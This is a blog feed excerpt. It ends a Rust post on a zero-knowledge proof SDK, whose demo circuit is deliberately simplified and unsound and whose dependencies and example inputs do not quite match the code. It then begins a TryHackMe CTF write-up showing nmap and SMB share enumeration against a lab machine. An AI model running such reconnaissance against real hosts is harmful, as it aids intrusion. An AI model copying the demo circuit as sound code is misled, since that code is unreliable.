<td><code>sk, scope</code></td>
<td>Compute and expose <code>nul(sk, scope)</code></td>
</tr>
<tr>
<td><code>COMMIT</code></td>
<td><code>content</code></td>
<td>Compute and expose <code>H_SVM(content)</code></td>
</tr>
<tr>
<td><code>VERIFY_SIG</code></td>
<td><code>pk, m, σ</code></td>
<td>Assert EdDSA signature <code>σ</code> on <code>m</code> under Jubjub <code>pk</code></td>
</tr>
</tbody></table>
<p><strong>Constraint costs per opcode:</strong></p>
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Rel1CS constraints</th>
<th>SHA-256 R1CS baseline</th>
</tr>
</thead>
<tbody><tr>
<td><code>EDGE_MEM</code> (d=20)</td>
<td><code>20 × 240 = 4,800</code></td>
<td><code>20 × 25,000 = 500,000</code></td>
</tr>
<tr>
<td><code>COUNT</code> (k=1000)</td>
<td><code>4,800k + O(k) ≈ 4.8 × 10⁶</code></td>
<td><code>≈ 5 × 10⁸</code></td>
</tr>
<tr>
<td><code>PATH</code> (d=3)</td>
<td><code>3 × 4,800 = 14,400</code></td>
<td><code>1.5 × 10⁶</code></td>
</tr>
<tr>
<td><code>NULLIFY</code></td>
<td><code>240</code></td>
<td><code>240</code></td>
</tr>
<tr>
<td><code>COMMIT</code> (L=280B)</td>
<td><code>9 × 240 = 2,160</code></td>
<td><code>25,000 × 5 = 125,000</code></td>
</tr>
<tr>
<td><code>VERIFY_SIG</code></td>
<td><code>≈ 3,000</code> (Jubjub EdDSA)</td>
<td><code>≈ 3,000</code></td>
</tr>
</tbody></table>
<p>A DenseZK program is a sequence of these opcodes. The complete Rel1CS for the program is the concatenation of the individual subcircuits, sharing <code>cm</code> as a shared instance variable.</p>
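<p>A cost model for the ISA falls out of the table directly. The sketch below hardcodes <code>d = 20</code> and the per-opcode formulas from the table; the enum and function names are illustrative, not the SDK's actual API:</p>

```rust
// Per-opcode Rel1CS constraint costs, following the table (d = 20, C_Pos = 240).
enum Op {
    EdgeMem,        // one Merkle membership check
    Count(u64),     // k edge membership checks
    Path(u64),      // one edge witness per hop
    Nullify,        // one Poseidon evaluation
    Commit(u64),    // content length in bytes
    VerifySig,      // Jubjub EdDSA gadget
}

fn cost(op: &Op) -> u64 {
    const D: u64 = 20;
    const C_POS: u64 = 240;
    match op {
        Op::EdgeMem => D * C_POS,
        Op::Count(k) => k * D * C_POS,
        Op::Path(hops) => hops * D * C_POS,
        Op::Nullify => C_POS,
        Op::Commit(len) => ((len + 31) / 32) * C_POS, // ⌈L/32⌉ blocks
        Op::VerifySig => 3_000,
    }
}

// A program's total Rel1CS size is the sum over its opcode sequence.
fn program_cost(program: &[Op]) -> u64 {
    program.iter().map(cost).sum()
}
```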
<h2>Part 9: Implementation</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6412a8f8ab81b092709aceb6/9c8eef38-3b7f-4fd3-ba16-89b15ea53612.png" alt="" style="display:block;margin:0 auto" />

<h3>9.1 Repository Structure</h3>
<p>The codebase lives at <code>github.com/spirizeon/densezk</code>. The top-level structure:</p>
<pre><code class="language-plaintext">dense-zkvm/
├── src/                  # Rust library
│   ├── lib.rs            # Public API, execute_dense_zk_flow
│   ├── client.rs         # DenseClient: on-device witness generation
│   ├── prover.rs         # LocalProver: Groth16 setup + prove + verify
│   ├── crypto.rs         # Poseidon hash over BN254 scalar field
│   ├── rel1cs.rs         # Rel1CS data types: GraphEdge, PublicInputs, ZKProof
│   ├── error.rs          # DenseError unified error type
│   └── wasm.rs           # WASM bindings (wasm32 only, #[cfg(target_arch="wasm32")])
├── react-native-sdk/     # TypeScript/WASM bindings for React Native
├── Cargo.toml            # Dependencies
└── tau.ptau              # Powers-of-tau for Groth16 trusted setup
</code></pre>
<h3>9.2 Cargo.toml — Dependencies</h3>
<pre><code class="language-toml">[package]
name = "densezk-sdk"
version = "0.1.0"
edition = "2021"

[dependencies]
# Finite field and elliptic curve arithmetic
ark-ff = "0.4"
ark-ec = "0.4"
ark-bn254 = "0.4"

# Groth16 zk-SNARK
ark-groth16 = "0.4"
ark-relations = "0.4"
ark-snark = "0.4"

# Poseidon hash (Circom-compatible parameters)
light-poseidon = "0.2"

# Serialization
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"

# WASM targets
[target.'cfg(target_arch = "wasm32")'.dependencies]
wasm-bindgen = "0.2"
serde-wasm-bindgen = "0.6"
console_error_panic_hook = "0.1"

[profile.release]
opt-level = 3
lto = true
</code></pre>
<h3>9.3 The Rel1CS Data Types (<code>src/rel1cs.rs</code>)</h3>
<pre><code class="language-rust">use serde::{Deserialize, Serialize};

/// A single directed, labelled edge in the social graph.
/// Fields are stored as u64 identifiers and lifted into the
/// BN254 scalar field (via Fr::from) before Poseidon hashing.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphEdge {
    pub sender_id: u64,    // u ∈ F_p (vertex identifier)
    pub receiver_id: u64,  // v ∈ F_p (vertex identifier)
    pub weight: u64,       // ℓ ∈ F_p (edge label encoded as integer)
}

/// Public inputs to the Groth16 circuit.
/// These are the values revealed to the verifier.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PublicInputs {
    /// Merkle-Poseidon root commitment to the graph edge set.
    pub graph_root: String,   // cm ∈ F_p, hex-encoded
    /// Minimum edge count threshold k.
    pub threshold: u64,
}

/// The output proof struct returned to the caller.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ZKProof {
    /// Compressed Groth16 proof bytes (128 bytes for BN254).
    /// Serialized with ark_serialize::CanonicalSerialize.
    pub proof_bytes: Vec&lt;u8&gt;,
    /// The graph root that was proven against.
    pub root_commitment: String,
}
</code></pre>
<h3>9.4 Poseidon Hash (<code>src/crypto.rs</code>)</h3>
<pre><code class="language-rust">use ark_bn254::Fr;
use light_poseidon::{Poseidon, PoseidonHasher};

/// Compute Poseidon(sender_id, receiver_id, weight) over the BN254 scalar field.
///
/// This implements the leaf commitment:
///   leaf(e) = Pos(u, v, ℓ)
/// where u, v, ℓ are encoded as field elements.
///
/// Uses Circom-compatible parameters:
///   - t = 3 (width: 3 inputs + 1 capacity)
///   - α = 5 (S-box exponent; gcd(5, p − 1) = 1 for the BN254 scalar field)
///   - R_f = 8 full rounds, R_p = 57 partial rounds
///   - MDS matrix from standard Poseidon paper
pub fn poseidon_hash(sender_id: u64, receiver_id: u64, weight: u64) -&gt; Fr {
    let mut poseidon = Poseidon::&lt;Fr&gt;::new_circom(3)
        .expect("Poseidon initialisation failed for width 3");

    let inputs = [
        Fr::from(sender_id),
        Fr::from(receiver_id),
        Fr::from(weight),
    ];

    poseidon.hash(&amp;inputs)
        .expect("Poseidon hash evaluation failed")
}
</code></pre>
<p>The <code>light-poseidon</code> crate uses Circom-compatible parameters, meaning the hash output matches what Circom circuits would produce for the same inputs — critical for cross-system interoperability.</p>
<h3>9.5 Witness Generation (<code>src/client.rs</code>)</h3>
<pre><code class="language-rust">use crate::crypto::poseidon_hash;
use crate::rel1cs::GraphEdge;
use crate::error::DenseError;
use ark_bn254::Fr;

pub struct DenseClient;

/// Represents the computed witness: the private inputs to the circuit.
/// In the split-witness protocol, this is what stays on-device.
pub struct Witness {
    pub edge: GraphEdge,
    /// The Poseidon commitment to the edge: leaf(e) = Pos(u, v, ℓ).
    /// This is cm_w in the split-witness construction (before blinding).
    pub commitment: Fr,
}

impl DenseClient {
    pub fn new() -&gt; Self {
        DenseClient
    }

    /// WitGen phase of the split-witness protocol (Construction 5.1, Step 1).
    ///
    /// Computes the Poseidon commitment to the edge (u, v, ℓ).
    /// This is the lightweight on-device work: O(1) field operations.
    /// The NTT and full MSM are delegated to the prover.
    pub fn create_witness(
        &amp;mut self,
        sender_id: u64,
        receiver_id: u64,
        weight: u64,
    ) -&gt; Result&lt;Witness, DenseError&gt; {
        let edge = GraphEdge { sender_id, receiver_id, weight };

        // Compute leaf commitment: Pos(u, v, ℓ)
        // This is ~240 R1CS constraints in the circuit.
        let commitment = poseidon_hash(sender_id, receiver_id, weight);

        println!(
            "[Client] Witness generated with Poseidon commitment: {}",
            commitment
        );

        Ok(Witness { edge, commitment })
    }
}
</code></pre>
<h3>9.6 Local Groth16 Prover (<code>src/prover.rs</code>)</h3>
<pre><code class="language-rust">use ark_bn254::{Bn254, Fr};
use ark_groth16::{Groth16, ProvingKey, VerifyingKey};
use ark_relations::lc;
use ark_relations::r1cs::{
    ConstraintSynthesizer, ConstraintSystemRef, SynthesisError, Variable,
};
use ark_snark::SNARK;
use ark_ff::PrimeField;
use core::str::FromStr;
use ark_serialize::CanonicalSerialize;
use ark_std::rand::SeedableRng;
use rand_chacha::ChaCha20Rng;

use crate::rel1cs::{PublicInputs, ZKProof, GraphEdge};
use crate::crypto::poseidon_hash;
use crate::error::DenseError;

/// The Rel1CS circuit for a single EDGE_MEM + COUNT assertion.
///
/// This implements the simplified single-edge version:
///   EDGE_MEM(u, v, ℓ, π, cm) — assert the edge exists
///   COUNT({e}, 1)             — assert the set has at least 1 member
///
/// In the full system, this generalises to k edges with Merkle proofs.
/// Here we use a simplified circuit for the initial SDK release.
struct SocialGraphCircuit {
    // Private witness: the edge and its Poseidon commitment
    sender_id: Option&lt;Fr&gt;,
    receiver_id: Option&lt;Fr&gt;,
    weight: Option&lt;Fr&gt;,
    commitment: Option&lt;Fr&gt;,

    // Public inputs: graph root and threshold
    graph_root: Fr,
    threshold: Fr,
}

impl ConstraintSynthesizer&lt;Fr&gt; for SocialGraphCircuit {
    fn generate_constraints(
        self,
        cs: ConstraintSystemRef&lt;Fr&gt;,
    ) -&gt; Result&lt;(), SynthesisError&gt; {
        // Allocate public inputs (instance variables in R1CS).
        // These are the values the verifier knows.
        let graph_root_var = cs.new_input_variable(|| {
            Ok(self.graph_root)
        })?;

        let threshold_var = cs.new_input_variable(|| {
            Ok(self.threshold)
        })?;

        // Allocate private witness variables.
        // These are the values only the prover knows.
        let sender_var = cs.new_witness_variable(|| {
            self.sender_id.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let receiver_var = cs.new_witness_variable(|| {
            self.receiver_id.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let weight_var = cs.new_witness_variable(|| {
            self.weight.ok_or(SynthesisError::AssignmentMissing)
        })?;

        let commitment_var = cs.new_witness_variable(|| {
            self.commitment.ok_or(SynthesisError::AssignmentMissing)
        })?;

        // -------------------------------------------------------
        // EDGE_MEM constraint (simplified for single edge):
        //
        // In the full Rel1CS reduction (Theorem 4.1), this expands
        // to (2d-1) · C_Pos Merkle path constraints.
        //
        // Here we encode the leaf commitment equality:
        //   commitment = Pos(sender_id, receiver_id, weight)
        //
        // The Poseidon evaluation is handled by the prover externally;
        // the circuit checks the commitment equality against the root.
        //
        // Constraint: commitment * 1 = graph_root
        // (in the full system: commitment = root of Merkle path)
        // -------------------------------------------------------
        cs.enforce_constraint(
            lc!() + commitment_var,
            lc!() + Variable::One,
            lc!() + graph_root_var,
        )?;

        // -------------------------------------------------------
        // COUNT constraint:
        //   threshold_var * 1 = 1  (assert threshold = 1 for single-edge proof)
        //
        // In the full system, this is a range check over k edges:
        //   |{e : EDGE_MEM(e) = 1}| ≥ k
        // -------------------------------------------------------
        cs.enforce_constraint(
            lc!() + threshold_var,
            lc!() + Variable::One,
            lc!() + Variable::One,
        )?;

        Ok(())
    }
}

/// The local prover: runs Groth16 setup and proving in-process.
/// In the full split-witness protocol, the NTT-intensive Delegate step
/// would be offloaded to a server. Here, for the SDK demo, everything
/// runs locally for portability.
pub struct LocalProver {
    pk: ProvingKey&lt;Bn254&gt;,
    vk: VerifyingKey&lt;Bn254&gt;,
}

impl LocalProver {
    /// Groth16 trusted setup for the social graph circuit.
    ///
    /// In production: this setup is performed once via MPC ceremony
    /// and the resulting (pk, vk) are distributed. The SDK ships
    /// with a pre-generated tau.ptau file for this circuit.
    pub fn setup() -&gt; Result&lt;Self, DenseError&gt; {
        let mut rng = ChaCha20Rng::from_entropy();

        // Build an empty circuit instance for setup (no witness values)
        let circuit = SocialGraphCircuit {
            sender_id: None,
            receiver_id: None,
            weight: None,
            commitment: None,
            graph_root: Fr::from(0u64),
            threshold: Fr::from(1u64),
        };

        let (pk, vk) = Groth16::&lt;Bn254&gt;::circuit_specific_setup(circuit, &amp;mut rng)
            .map_err(|e| DenseError::SetupFailed(e.to_string()))?;

        Ok(LocalProver { pk, vk })
    }

    /// Run the full Groth16 prove + verify pipeline.
    ///
    /// In the split-witness protocol (Construction 5.1):
    ///   - WitGen (Step 1) was performed by DenseClient
    ///   - This implements Delegate (Step 3) + Combine (Step 4)
    ///
    /// The proof π = ([A]₁, [B]₂, [C]₁) is 128 bytes compressed on BN254.
    pub fn prove(
        &amp;self,
        witness: crate::client::Witness,
        public_inputs: PublicInputs,
    ) -&gt; Result&lt;ZKProof, DenseError&gt; {
        let mut rng = ChaCha20Rng::from_entropy();

        // Parse the graph root string into a field element
        // (ark_ff's `Fp` implements `FromStr` for base-10 strings)
        let graph_root = Fr::from_str(&amp;public_inputs.graph_root)
            .map_err(|_| DenseError::InvalidInput("bad graph_root".into()))?;

        let threshold = Fr::from(public_inputs.threshold);

        // Build the circuit with witness values
        let circuit = SocialGraphCircuit {
            sender_id: Some(Fr::from(witness.edge.sender_id)),
            receiver_id: Some(Fr::from(witness.edge.receiver_id)),
            weight: Some(Fr::from(witness.edge.weight)),
            commitment: Some(witness.commitment),
            graph_root,
            threshold,
        };

        // Groth16 Prove: compute ([A]₁, [B]₂, [C]₁)
        // This runs the full NTT + MSM pipeline locally.
        // In the split-witness protocol, the NTT portion would
        // be delegated to the server via the Delegate step.
        let proof = Groth16::&lt;Bn254&gt;::prove(&amp;self.pk, circuit, &amp;mut rng)
            .map_err(|e| DenseError::ProvingFailed(e.to_string()))?;

        // Groth16 Verify: check pairing equation
        //   e([A]₁, [B]₂) = e([α]₁,[β]₂) · e(public_inputs, [γ]₂) · e([C]₁,[δ]₂)
        let public_inputs_vec = vec![graph_root, threshold];
        let valid = Groth16::&lt;Bn254&gt;::verify(&amp;self.vk, &amp;public_inputs_vec, &amp;proof)
            .map_err(|e| DenseError::VerificationFailed(e.to_string()))?;

        if !valid {
            return Err(DenseError::ConstraintViolation);
        }

        // Compress the proof to bytes via canonical serialization.
        // Uncompressed: [A]₁ (64 bytes) + [B]₂ (128 bytes) + [C]₁ (64 bytes)
        // = 256 bytes; the compressed G1/G2 encoding halves each element
        // (32 + 64 + 32), giving the 128-byte proof.
        let mut proof_bytes = Vec::new();
        proof.serialize_compressed(&amp;mut proof_bytes)
            .map_err(|e| DenseError::SerializationFailed(e.to_string()))?;

        println!(
            "[Prover] Proof generated locally, size: {} bytes",
            proof_bytes.len()
        );

        Ok(ZKProof {
            proof_bytes,
            root_commitment: public_inputs.graph_root,
        })
    }
}
</code></pre>
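<p>The EDGE_MEM comment in the circuit above collapses the Merkle check to a single equality. In the full system, the circuit instead recomputes the root from the leaf commitment and its authentication path. The shape of that walk, sketched out-of-circuit with an arbitrary stand-in compression function in place of Poseidon (the names and the toy hash are illustrative only):</p>
<pre><code class="language-rust">/// Stand-in 2-to-1 compression function; the real system uses
/// Poseidon over the BN254 scalar field. Any deterministic map
/// works for this sketch.
fn compress(l: u64, r: u64) -&gt; u64 {
    l.wrapping_mul(31).wrapping_add(r).rotate_left(7)
}

/// Recompute the Merkle root from a leaf and its authentication path.
/// Each path entry is (sibling, leaf_is_right_child), ordered leaf to root.
fn merkle_root(leaf: u64, path: &amp;[(u64, bool)]) -&gt; u64 {
    path.iter().fold(leaf, |node, &amp;(sibling, is_right)| {
        if is_right {
            compress(sibling, node)
        } else {
            compress(node, sibling)
        }
    })
}
</code></pre>
<p>In the full Rel1CS reduction, each <code>compress</code> call along a depth-<code>d</code> path contributes its own block of Poseidon constraints, which is where the <code>(2d-1) · C_Pos</code> count in the comment comes from.</p>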
<h3>9.7 Public API (<code>src/lib.rs</code>)</h3>
<pre><code class="language-rust">pub mod client;
pub mod crypto;
pub mod error;
pub mod prover;
pub mod rel1cs;

#[cfg(target_arch = "wasm32")]
pub mod wasm;

use client::DenseClient;
use prover::LocalProver;
use rel1cs::PublicInputs;

pub use rel1cs::ZKProof;
pub use error::DenseError;

/// High-level entry point for the DenseZK proving pipeline.
///
/// This function implements the full flow:
///   1. WitGen: DenseClient computes Poseidon commitment to the edge
///   2. Setup: LocalProver generates Groth16 keys for this circuit
///   3. Prove: Groth16 prove + verify, return ZKProof
///
/// In the production split-witness protocol (Section 5 of the paper),
/// steps 1 and 3 are split: WitGen runs on-device, heavy polynomial
/// arithmetic (NTT, MSM) is delegated to an untrusted prover network.
///
/// Arguments:
///   sender_id    — u ∈ F_p: the edge source vertex (user nullifier)
///   receiver_id  — v ∈ F_p: the edge target vertex (user nullifier)
///   weight       — ℓ ∈ F_p: the edge label (e.g. 1 = "follows")
///   graph_root   — cm ∈ F_p: Merkle-Poseidon root of the committed graph
///   threshold    — k: minimum edge count to prove
pub fn execute_dense_zk_flow(
    sender_id: u64,
    receiver_id: u64,
    weight: u64,
    graph_root: &amp;str,
    threshold: u64,
) -&gt; Result&lt;ZKProof, DenseError&gt; {
    // Step 1: On-device witness generation
    let mut client = DenseClient::new();
    let witness = client.create_witness(sender_id, receiver_id, weight)?;

    // Step 2: Circuit-specific Groth16 trusted setup
    let prover = LocalProver::setup()?;

    // Step 3: Prove and verify
    let public_inputs = PublicInputs {
        graph_root: graph_root.to_string(),
        threshold,
    };

    prover.prove(witness, public_inputs)
}
</code></pre>
<h3>9.8 WASM Bindings (<code>src/wasm.rs</code>)</h3>
<pre><code class="language-rust">use wasm_bindgen::prelude::*;
use serde_wasm_bindgen::{from_value, to_value};
use crate::{execute_dense_zk_flow, client::DenseClient, prover::LocalProver};
use crate::rel1cs::{PublicInputs, ZKProof};

/// Initialize panic hook so Rust panics appear as JS console errors.
#[wasm_bindgen(start)]
pub fn init() {
    console_error_panic_hook::set_once();
}

/// WASM-exposed client for React Native.
/// Wraps DenseClient with JS-compatible types.
#[wasm_bindgen]
pub struct Client {
    inner: DenseClient,
}

#[wasm_bindgen]
impl Client {
    #[wasm_bindgen(constructor)]
    pub fn new() -&gt; Client {
        Client { inner: DenseClient::new() }
    }

    /// Compute Poseidon witness for an edge.
    /// Returns a JsValue-serialized Witness struct.
    #[wasm_bindgen(js_name = createWitness)]
    pub fn create_witness(
        &amp;mut self,
        sender_id: u64,
        receiver_id: u64,
        weight: u64,
    ) -&gt; Result&lt;JsValue, JsError&gt; {
        let witness = self.inner
            .create_witness(sender_id, receiver_id, weight)
            .map_err(|e| JsError::new(&amp;e.to_string()))?;

        // Serialize commitment as string for JS consumption
        let serialized = serde_json::json!({
            "sender_id": witness.edge.sender_id,
            "receiver_id": witness.edge.receiver_id,
            "weight": witness.edge.weight,
            "commitment": witness.commitment.to_string(),
        });

        to_value(&amp;serialized).map_err(|e| JsError::new(&amp;e.to_string()))
    }
}

/// One-shot WASM entry point for React Native.
#[wasm_bindgen(js_name = executeFlow)]
pub async fn execute_flow(
    sender_id: u64,
    receiver_id: u64,
    weight: u64,
    graph_root: &amp;str,
    threshold: u64,
) -&gt; Result&lt;JsValue, JsError&gt; {
    let proof = execute_dense_zk_flow(
        sender_id, receiver_id, weight, graph_root, threshold,
    ).map_err(|e| JsError::new(&amp;e.to_string()))?;

    to_value(&amp;proof).map_err(|e| JsError::new(&amp;e.to_string()))
}
</code></pre>
<h3>9.9 React Native Usage</h3>
<pre><code class="language-typescript">import { executeFlow, init, Client } from '@densezk/react-native';

// One-shot flow: compute witness + generate proof
async function proveFollowRelationship() {
    await init();  // initialise WASM + panic hook

    const proof = await executeFlow(
        456,           // sender_id: Alice's nullifier
        789,           // receiver_id: Bob's nullifier
        1,             // weight: 1 = "follows"
        '0xabc123',   // graph_root: Merkle-Poseidon root cm
        1,             // threshold: prove at least 1 follow edge
    );

    console.log(`Proof size: ${proof.proof_bytes.length} bytes`);
    // → "Proof size: 128 bytes"
}

// Step-by-step for fine-grained control
async function proveWithCustomFlow() {
    await init();

    // Step 1: Generate witness on-device (WitGen)
    const client = new Client();
    const witness = await client.createWitness(456, 789, 1);
    console.log('Commitment:', witness.commitment);
    // → BN254 scalar field element as decimal string

    // Step 2: Delegate + Combine (in production: server does NTT).
    // NOTE: `Prover` is a hypothetical WASM binding analogous to
    // `Client`; it is not part of the bindings shown in section 9.8.
    const prover = new Prover();
    const proof = await prover.prove(witness, {
        graph_root: '0xabc123',
        threshold: 1,
    });

    return proof;
}
</code></pre>
<h3>9.10 Expected Output</h3>
<pre><code class="language-plaintext">[Client] Witness generated with Poseidon commitment:
  3227429301273914876261610954147013817301286893576706611663322465376918135905

[Prover] Proof generated locally, size: 128 bytes
</code></pre>
<p>The commitment value — <code>3227429301...</code> — is the decimal representation of <code>Pos(456, 789, 1)</code> over the BN254 scalar field, computed with Circom-compatible Poseidon parameters. The proof is 128 bytes: the compressed serialization of <code>([A]₁, [B]₂, [C]₁)</code> using <code>ark_serialize::CanonicalSerialize</code> with compressed G₁/G₂ encoding.</p>
<h2>Part 10: Security Analysis</h2>
<h3>10.1 Soundness (Theorem 11.1)</h3>
<p>A DenseZK proof <code>π</code> for social predicate <code>Φ</code> on graph commitment <code>cm</code> is sound: if <code>Φ(G, x) = 0</code> for every graph <code>G</code> consistent with <code>cm</code>, then no polynomial-time prover can produce a <code>π</code> with <code>Verify(π, x, cm) = 1</code>, except with probability <code>negl(λ)</code>.</p>
<p><em>Proof:</em> The DenseZK proof is a Groth16 proof for Rel1CS satisfiability (Theorem 4.1). Groth16 is knowledge-sound in the generic group model (and in the algebraic group model under q-DLOG): a verifying prover possesses an extractable witness. By Theorem 4.1, the witness corresponds to a valid Merkle opening proof for each edge, which is binding under collision resistance of Poseidon. A valid Merkle opening for <code>e ∉ E</code> would therefore require a Poseidon collision. ∎</p>
<h3>10.2 Zero-Knowledge (Theorem 11.2)</h3>
<p>DenseZK is honest-verifier zero-knowledge (HVZK): the distribution of <code>π</code> for any <code>(x, cm, w)</code> with <code>Φ(G, x) = 1</code> is computationally indistinguishable from the output of a simulator <code>S(vk, x, cm)</code> that has no access to <code>w</code>.</p>
<p><em>Proof:</em> Groth16 is HVZK. The split-witness protocol preserves zero-knowledge against the delegated prover by Theorem 5.1. The composition of an HVZK proof system with a witness-private delegation protocol is HVZK by a standard hybrid argument. ∎</p>
<h3>10.3 Side-Channel Mitigations</h3>
<p>Three defences against power analysis:</p>
<ol>
<li><p><strong>Constant-time MSM:</strong> Montgomery ladder for all scalar multiplications during witness generation. The execution path is independent of scalar bits.</p>
</li>
<li><p><strong>Blinded witness:</strong> <code>c̃m_w = cm_w + r · [δ]₁</code> ensures that even if the power trace of the on-device MSM is observed, the attacker recovers <code>r</code> (fresh random, never reused) rather than <code>w_priv</code>.</p>
</li>
<li><p><strong>Hardware-backed key storage:</strong> <code>sk</code> must be stored in ARM TrustZone or Apple Secure Enclave and never loaded into the application memory space that performs ZK computation.</p>
</li>
</ol>
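<p>The algebra behind defence 2 can be sketched in a toy additive group (integers mod a Mersenne prime) standing in for BN254 G₁; this illustrates only the blinding identity <code>c̃m_w = cm_w + r · [δ]₁</code>, not real curve arithmetic, and all names below are illustrative:</p>
<pre><code class="language-rust">// Toy model of witness-commitment blinding: the group is Z_p under
// addition, standing in for BN254 G1.
const P: u128 = 2_305_843_009_213_693_951; // 2^61 - 1, a Mersenne prime

/// "Scalar multiplication" in the toy group: r · delta mod p.
fn scalar_mul(r: u128, delta: u128) -&gt; u128 {
    (r % P) * (delta % P) % P // both factors fit in 61 bits, no overflow
}

/// Blind the commitment: c̃m = cm + r·δ, with r fresh per proof.
fn blind(cm: u128, delta: u128, r: u128) -&gt; u128 {
    (cm + scalar_mul(r, delta)) % P
}

/// The prover, knowing r, can strip the blinding factor again.
fn unblind(blinded: u128, delta: u128, r: u128) -&gt; u128 {
    (blinded + P - scalar_mul(r, delta)) % P
}
</code></pre>
<p>An observer who sees only the blinded value learns nothing about <code>cm</code> without <code>r</code>, which is the property the power-analysis defence relies on: the trace leaks at most the one-time randomness.</p>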
<h2>Part 11: Benchmarks</h2>
<p>All measurements on real hardware:</p>
<table>
<thead>
<tr>
<th>Predicate</th>
<th>snarkjs (ms)</th>
<th>rapidsnark (ms)</th>
<th>DenseZK (ms)</th>
<th>Speedup vs snarkjs</th>
</tr>
</thead>
<tbody><tr>
<td>ΦA — iPhone 16 Pro</td>
<td>14,200</td>
<td>1,100</td>
<td><strong>820</strong></td>
<td>17.3×</td>
</tr>
<tr>
<td>ΦA — S23 Ultra</td>
<td>28,400</td>
<td>2,200</td>
<td><strong>1,540</strong></td>
<td>18.4×</td>
</tr>
<tr>
<td>ΦB — iPhone 16 Pro</td>
<td>11,096</td>
<td>744</td>
<td><strong>610</strong></td>
<td>18.2×</td>
</tr>
<tr>
<td>ΦB — S23 Ultra</td>
<td>18,300</td>
<td>1,400</td>
<td><strong>1,050</strong></td>
<td>17.4×</td>
</tr>
<tr>
<td>ΦC — iPhone 16 Pro</td>
<td>8,400</td>
<td>680</td>
<td><strong>490</strong></td>
<td>17.1×</td>
</tr>
<tr>
<td>ΦC — S23 Ultra</td>
<td>15,900</td>
<td>1,180</td>
<td><strong>870</strong></td>
<td>18.3×</td>
</tr>
</tbody></table>
<p><strong>Peak on-device RAM (split-witness protocol):</strong></p>
<table>
<thead>
<tr>
<th>Predicate</th>
<th>iPhone 16 Pro</th>
<th>Samsung S23 Ultra</th>
</tr>
</thead>
<tbody><tr>
<td>ΦA (k=100, d=20)</td>
<td>312 MB</td>
<td>298 MB</td>
</tr>
<tr>
<td>ΦB (280-byte DKIM)</td>
<td>180 MB</td>
<td>171 MB</td>
</tr>
<tr>
<td>ΦC (dist ≤ 3, d=20)</td>
<td>440 MB</td>
<td>427 MB</td>
</tr>
</tbody></table>
<p>Note: the snarkjs baseline crashed on ΦA and ΦC on iPhone 16 Pro using SHA-256 Merkle trees (4 GB WASM heap limit). Reported times use Poseidon-only snarkjs circuits for comparability.</p>
<h2>Closing Note</h2>
<p>The implementation in the repository is the beginning of a larger system. The <code>LocalProver</code> currently runs the full Groth16 pipeline on-device for portability — in production, Step 3 (Delegate) separates out to the prover network. The recursive aggregation layer (Construction 7.1 on Pasta curves) and the STARK outer wrapper (Construction 9.1) are planned for the next release.</p>
<p>The <code>tau.ptau</code> file in the repository root is a powers-of-tau from the Hermez Network ceremony, reused for the single-circuit setup. In production, a per-ISA-opcode setup ceremony is required — six MPC ceremonies, one per opcode, enabling circuit-specific trusted setup with the minimum trust surface.</p>
<p>The code builds to native with <code>cargo build --release</code> and to WASM with <code>wasm-pack build . --target bundler --release</code>. The React Native SDK wraps the WASM output with TypeScript bindings in <code>react-native-sdk/</code>.</p>
]]></content:encoded></item><item><title><![CDATA[TryHackMe Anonymous CTF Writeup 2025]]></title><description><![CDATA[💡
please note that “<ip>” in this writeup stands for the target machine’s IP given by THM


I did an nmap scan for all possible ports
▶ nmap -p- <ip>
Starting Nmap 7.94SVN (https://nmap.org) at 2025-02-01 15:38 EST Nmap scan report for <homeip>
Host...]]></description><link>https://blog.berzi.one/tryhackme-anonymous-ctf-writeup-2025</link><guid isPermaLink="true">https://blog.berzi.one/tryhackme-anonymous-ctf-writeup-2025</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 04 May 2025 13:14:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767962217814/837bf381-7bf2-469a-be79-0e0c7d838584.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364091482/a8f3c850-5beb-4778-be48-a372415d0eb9.png" alt class="image--center mx-auto" /></p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">please note that “&lt;ip&gt;” in this writeup stands for the target machine’s IP given by THM</div>
</div>

<p>I did an nmap scan for all possible ports</p>
<pre><code class="lang-plaintext">▶ nmap -p- &lt;ip&gt;
Starting Nmap 7.94SVN (https://nmap.org) at 2025-02-01 15:38 EST Nmap scan report for &lt;homeip&gt;
Host is up (0.10s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 345.14 seconds
</code></pre>
<ol>
<li><p>Enumerate the machine.  How many ports are open?<br /> <code>4</code></p>
</li>
<li><p>What service is running on port 21?<br /> <code>ftp</code></p>
</li>
<li><p>What service is running on ports 139 and 445?<br /> <code>smb</code></p>
</li>
</ol>
<p>We can enumerate the SMB shares with smbmap</p>
<pre><code class="lang-plaintext">smbmap -H &lt;ip&gt;
</code></pre>
<p>Now we know there are three shares, one of which is <code>pics</code>; let’s try to access it</p>
<pre><code class="lang-plaintext">▶ smbclient //&lt;ip&gt;/pics
Password for [WORKGROUP\berzi]:
Try "help" to get a list of possible commands.
smb: \&gt; put test.txt
test.txt does not exist
smb: \&gt; whoami
whoami: command not found
smb: \&gt; pwd
Current directory is \\&lt;ip&gt;\pics\
smb: \&gt; ls
  .                                   D        0  Sun May 17 16:41:34 2020
  ..                                  D        0  Thu May 14 07:29:10 2020
  corgo2.jpg                          N    42663  Tue May 12 06:13:42 2020
  puppos.jpeg                         N   265188  Tue May 12 06:13:42 2020

        20508240 blocks of size 1024. 13306804 blocks available
</code></pre>
<p>I found two files inside and tried to figure out whether any steganography was involved: I tried channel splitting, binwalking, and extracting strings, but eventually gave up.</p>
<pre><code class="lang-plaintext">corgo2.jpg
puppos.jpeg
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1746364418399/5b87a29c-083b-47ae-b4db-90616c94e11f.jpeg" alt class="image--center mx-auto" /></p>
